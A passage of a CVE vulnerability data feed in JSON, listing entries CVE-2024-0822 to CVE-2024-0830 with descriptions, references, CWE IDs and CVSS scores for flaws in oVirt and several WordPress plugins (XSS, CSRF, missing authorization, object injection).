"https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d13d072e-9c9c-4a32-b9f4-7d15dc704b50?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Cost of Goods Sold (COGS): Cost & Profit Calculator for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'section' parameter in all versions up to, and including, 3.2.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpfactory:cost_of_goods_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.2.9", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-03-04T12:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0822", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-287" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/errata/RHSA-2024:0934", "name" : "RHSA-2024:0934", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/errata/RHSA-2024:0934", "name" : "RHSA-2024:0934", "refsource" : "", "tags" : [ ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0822", "name" : "https://access.redhat.com/security/cve/CVE-2024-0822", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0822", "name" : "https://access.redhat.com/security/cve/CVE-2024-0822", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258509", "name" : "RHBZ#2258509", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258509", "name" : "RHBZ#2258509", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Third Party Advisory" ] }, { "url" : "https://github.com/oVirt/ovirt-engine/pull/914", "name" : "https://github.com/oVirt/ovirt-engine/pull/914", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/oVirt/ovirt-engine/pull/914", "name" : "https://github.com/oVirt/ovirt-engine/pull/914", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An authentication bypass vulnerability was found in overt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ovirt:ovirt-engine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-25T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0823", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php", "name" : "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php", "name" : "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/elements/logo-carousel/logo-carousel.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c5cdc3f-eaa6-4d0b-9e75-5483c723e15a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Link To' url in carousels in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:devscred:exclusive_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.6.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0824", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/extensions/link-anything.php", "name" : "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/extensions/link-anything.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/extensions/link-anything.php", "name" : "https://plugins.trac.wordpress.org/changeset/3026499/exclusive-addons-for-elementor/trunk/extensions/link-anything.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/925b0a86-ed23-471c-84e2-ae78a01b1876?source=cve", "refsource" : "", "tags" : [ "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Link Anything functionality in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:devscred:exclusive_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.6.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-27T05:15Z", "lastModifiedDate" : "2025-05-29T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0825", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-502" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/vimeography/trunk/lib/api/galleries.php#L816", "name" : "https://plugins.trac.wordpress.org/browser/vimeography/trunk/lib/api/galleries.php#L816", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/vimeography/trunk/lib/api/galleries.php#L816", "name" : "https://plugins.trac.wordpress.org/browser/vimeography/trunk/lib/api/galleries.php#L816", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/853516b2-ec50-4937-89d3-d16042a6f71c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Vimeography: Vimeo Video Gallery WordPress Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.3.2 via deserialization of untrusted input via the vimeography_duplicate_gallery_serialized in the duplicate_gallery function. This makes it possible for authenticated attackers attackers, with contributor access or higher, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:davekiss:vimeography:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.3.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-05T02:15Z", "lastModifiedDate" : "2025-03-11T16:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0826", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/qi-addons-for-elementor/trunk/inc/shortcodes/info-button/class-qiaddonsforelementor-info-button-shortcode.php#L695", "name" : "https://plugins.trac.wordpress.org/browser/qi-addons-for-elementor/trunk/inc/shortcodes/info-button/class-qiaddonsforelementor-info-button-shortcode.php#L695", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/qi-addons-for-elementor/trunk/inc/shortcodes/info-button/class-qiaddonsforelementor-info-button-shortcode.php#L695", "name" : "https://plugins.trac.wordpress.org/browser/qi-addons-for-elementor/trunk/inc/shortcodes/info-button/class-qiaddonsforelementor-info-button-shortcode.php#L695", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044865%40qi-addons-for-elementor%2Ftrunk&old=3025062%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file39", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044865%40qi-addons-for-elementor%2Ftrunk&old=3025062%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file39", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044865%40qi-addons-for-elementor%2Ftrunk&old=3025062%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file39", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044865%40qi-addons-for-elementor%2Ftrunk&old=3025062%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=#file39", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/40a883e8-7ce0-4fca-a585-428b67144694?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/40a883e8-7ce0-4fca-a585-428b67144694?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/40a883e8-7ce0-4fca-a585-428b67144694?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/40a883e8-7ce0-4fca-a585-428b67144694?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.6.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:qodeinteractive:qi_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.6.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-04-09T19:15Z", "lastModifiedDate" : "2025-02-07T17:54Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0827", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php", "name" : "https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php", "name" : "https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.4. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hammadh:play.ht:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.6.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T13:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0828", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php", "name" : "https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php", "name" : "https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 3.6.4. This makes it possible for authenticated attackers, with subscriber access or higher, to delete, retrieve, or modify post metadata, retrieve posts contents of protected posts, modify conversion data and delete article audio." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hammadh:play.ht:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.6.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "LOW", "baseScore" : 6.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.4 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T13:29Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0829", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php", "name" : "https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php", "name" : "https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.0. This is due to missing or incorrect capability checks on several ajax actions. This makes it possible for authenticated attackers, with subscriber access or higher, to invoke those actions. As a result, they may modify comment form fields and update plugin settings." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:najeebmedia:comments_extra_fields:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "5.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T13:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0830", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php", "name" : "https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php", "name" : "https://plugins.trac.wordpress.org/browser/wp-comment-fields/trunk/classes/admin.class.php", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0. This is due to missing or incorrect nonce validation on several ajax actions. This makes it possible for unauthenticated attackers to invoke those actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. As a result, they may modify comment form fields and update plugin settings." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:najeebmedia:comments_extra_fields:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "5.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { 